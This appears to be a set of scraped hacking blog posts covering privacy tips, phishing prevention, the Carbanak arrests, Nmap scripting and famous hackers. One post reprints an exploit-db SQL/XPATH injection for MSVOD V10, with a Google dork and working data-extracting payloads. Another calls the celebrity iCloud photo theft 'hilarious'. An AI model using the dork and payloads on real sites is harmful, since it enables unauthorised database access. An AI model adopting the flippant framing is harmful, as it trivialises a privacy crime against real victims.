This video tutorial will walk you through creating a BadUSB which will give you a reverse shell. This is the same thing as the USBRubberDucky from Hak5 except its only $3 (RubberDucky is 45 bucks).
- Use Decentralized alternatives.
- Fire up that VPN
- Fortify your browser and your devices
- Utilize Aliases for your own protection
Decentralized alternatives to popular websites on the internet are slowly beginning to pop up and gain prevalence as we are seeing increased prevalence on various media sources. Alternatives to youtube and other social networking sites like DTube exist. Here is an article listing 4 popular decentralized Social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we obviously have anonymizing darkwebs such as Tor, Freenet and I2P. However I would be an idiot not to note the fact that these platforms have had extreme amounts of trouble gaining any sort of traction with their target audience due to the fact that they lack the addictive simplicity that services like Instagram, Facebook, and Youtube have. Only time will tell if one of these platforms will gain enough popularity to become viable alternatives to what we currently have.
Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd party eves-droppers and the fact that we really don’t know what information is being given away by our internet service providers.
Utilize TOR or some other encrypted peer to peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don’t really recommend them for the average user who is simply trying to protect themselves preemptively.
Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.
Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.
Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.
Note: I am speaking about all this in wake of the recent Mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, Corporate Censorship is a new breed altogether. Normally it would be the government, but with big corporate run media platforms anyone can be censored off the platforms if it serves the corporate interest. I’m no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.
Three Ukranian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses. These hackers were part of the Carbanak Group
Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.
The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.
Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.
How to prevent
What can I do to prevent such an attack on my personal life or business? Social Engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other form of correspondence to make it appear like its coming from a legitimate source.
So my main advice is to always check the URL. Make sure it is secure (https) and if it has a SSL certificate thats even better. If you recieve an email always look at the domain of the email. Any misspellings in the domain can mean that its fake. If there are attatchments do not open them until you have verification that they are safe. If you cannot get verification that its from a legitimate source, you can always scan the attatchments before opening them, or analyze them within a VM.
Do not give your password away via plaintext ever. Use a VPN if you’re in public as there are potentially people who could be evesdropping on public networks (like at a Starbucks or Mcdonalds Wi-Fi) And Install an Anti-Virus on your PC. Also get the antivirus’s browser addon. These addons can tell you if the site has been reported as a hacked hacked site or a phishing attack.
I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.
Fixing this kind of injection is relatively simple. According to OWASP:
“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”
Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.
# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Limit 0,1, limit 1,1, limit 2,1, etc
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility due to the fact that it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka The hacker’s sswiss army knife. Yep. every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports ssl encryption. Making it the more practical of the two in today’s age of encryption.
$ ncat 192.168.1.100 80
But wait there’s more!
Nmap now has the Nmap Scripting Engine. This gives it way more versatility than ever before. None of this is new news to alot of people I realize, but its a bit impressive if you take a step back and think about the fact that Nmap started off as a simple portscanner.
To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.
If you’re on linux just type “locate *.nse”
$ locate *.nse /usr/share/nmap/scripts/acarsd-info.nse /usr/share/nmap/scripts/address-info.nse /usr/share/nmap/scripts/afp-brute.nse /usr/share/nmap/scripts/afp-ls.nse /usr/share/nmap/scripts/afp-path-vuln.nse /usr/share/nmap/scripts/afp-serverinfo.nse /usr/share/nmap/scripts/afp-showmount.nse /usr/share/nmap/scripts/ajp-auth.nse /usr/share/nmap/scripts/ajp-brute.nse /usr/share/nmap/scripts/ajp-headers.nse /usr/share/nmap/scripts/ajp-methods.nse /usr/share/nmap/scripts/ajp-request.nse /usr/share/nmap/scripts/allseeingeye-info.nse /usr/share/nmap/scripts/amqp-info.nse /usr/share/nmap/scripts/asn-query.nse ...
Now we know where the scripts are installed, but how do we use it?
$ nmap -sC TargetNameHere
The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.
$ nmap --script smb-check-vulns-nse 192.168.1.1
Now you know the basics, but the trick is to go out and learn how to write your own scripts. I’ll do that in a later tutorial if its asked for, but in the mean time, go and see if you can find some nse scripts written by other people. There is alot that people have accomplished on their own. Thats the beauty of open source. One example of this is nmap vulnerability scan on github (link below) They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the github for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don’t do anything stupid with it.
Kevin Mitnick a famous white hat hacker is now a professional security consultant and entrepreneur. His among his exploits are the Pentagon, Nokia, and Motorola. He eventually got convicted and served 5 years in prison. Once he got out he became the rich security consultant we know today. Does crime pay? Perhaps if your reputation precedes you.
Gary Mckinnon hacked into 97 U.S. Military and NASA computers during 2001 and 2002. He was looking for information on UFOs and evidence of a conspiracy that the US government was hiding technologies that could solve the energy crisis. He also shut down 1000 government computers and somehow rendered 300 of the inoperable causing up to $700,000 in damages. Eventually he got caught but he dodged charges because he was Scottish and they denied his extradition.
Jonathan James AKA c0mrade started hacking as a kid and was the first minor to be arrested and sent to prison at the age of 16. He hacked into the Defense Threat Reduction Agency and NASA. He downloaded source code used for the International Space Station. He committed suicide in 2008 because he was afraid he was going to be wrongfully imprisoned for several attacks on corporate networks that he was under suspicion for.
Adrian Lamo would often hack into media sources and change details on the website. He would then notify the owners of the press source and help them fix their security. However when he hacked into the New York Times he got arrested. Though later on in life he eventually ended up helping out law enforcement by turning Chelsea Manning for being a source to WikiLeaks which he now deeply regrets. Fun fact about Adrian Lamo: He had Asperger syndrome.
Ryan Collins was the hacker (or social engineer rather) behind “the fappening” a hilarious exploit where Collins used the standard email phishing attack to gain access to celebrity iCloud accounts where he was then able to obtain a whole bunch of their photos. Many of said photos happened to be sensitive. In fact, they were nude photos of several famous celebrities including Jennifer Lawrence, Kate Upton, and Kirstin Dunst. Several celebrities chose to deny authenticity of the leaks including Ariana Grande.
Albert Gonzalez installed a sniffer in various corporate networks and was able to steal millions of users credit cards and ATM details. Apparently he sold about 170 million pieces of sensitive data resulting in one of the largest cases of identity theft ever.
Astra is said to be a 58 year old greek mathematician who hacked into a french corporation called Dassault Group and he sold sensitive weapons information to various companies over a period of five years. When authorities caught him in 2008 they never revealed his information but just said that he was a 58 year old greek mathematician. It just goes to show how versatile a degree in mathematics really is.
Kevin Poulsen stole wiretap info from the FBI, hacked a radio stations phone lines in order to win a Porsche, helped law enforcement catch 744 sex predators over MySpace and is now a senior editor for Wired. How does your resume compare to that?
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
You may recognize this quote from the hacker manifesto. This famous manifesto was written by none other than Loyd Blankenship. His writings helped to inspire a generation of hackers to drop the controller and pick up a linux distro. He was a member of the Legion of Doom hacker group and has been hacking since the 70s. You could call him one of the fathers of modern hacking. Whatever you call him, he’s definitely an OG.
Julian Assange started hacking when he was 16. He broke into NASA, the Pentagon Citibank, Stanford, and Lockheed Martin. His biggest accomplishment was founding WikiLeaks. He is currently in the Ecuadorian Embasy in London trying to prevent his Extradition.
What is a hacker? According to google it is “a person who uses computers to gain unauthorized access to data.” But what are the different motives of hackers and how do we define the difference? Hackers are typically divided up into three subcategories. You’ve got White Hats, Black Hats and Grey hats.
White Hat: a hacker who hacks legally/ethically for profit or non-profit. Penetration testers, security consultants, computer forensics and incident response teams are just a few examples of the roles that white hats will often play within the public and private sectors. You can usually find them at big tech conventions like Black Hat or DefCon as well as various freelancing websites.
Black Hat: a criminal hacker who hacks illegally for fun, profit, revenge or a whole array of nefarious reasons. These hackers are usually found frequenting various underground forums and IRC channels.
Grey Hat: These hackers are typically harder to pin down. They may or may not be bound by an ethical or legal code but you won’t find them committing malicious crimes. Most hackers fall within black or white hat but there is definitely a spectrum as not all white hats are ethical and not all black hats are criminals.
With that being said guys, there are a whole lot of reasons why hackers start hacking and I couldn’t even hope to list all of them but understand that there is definitely a moral line and a legal line that you have to identify before you do anything you’ll regret.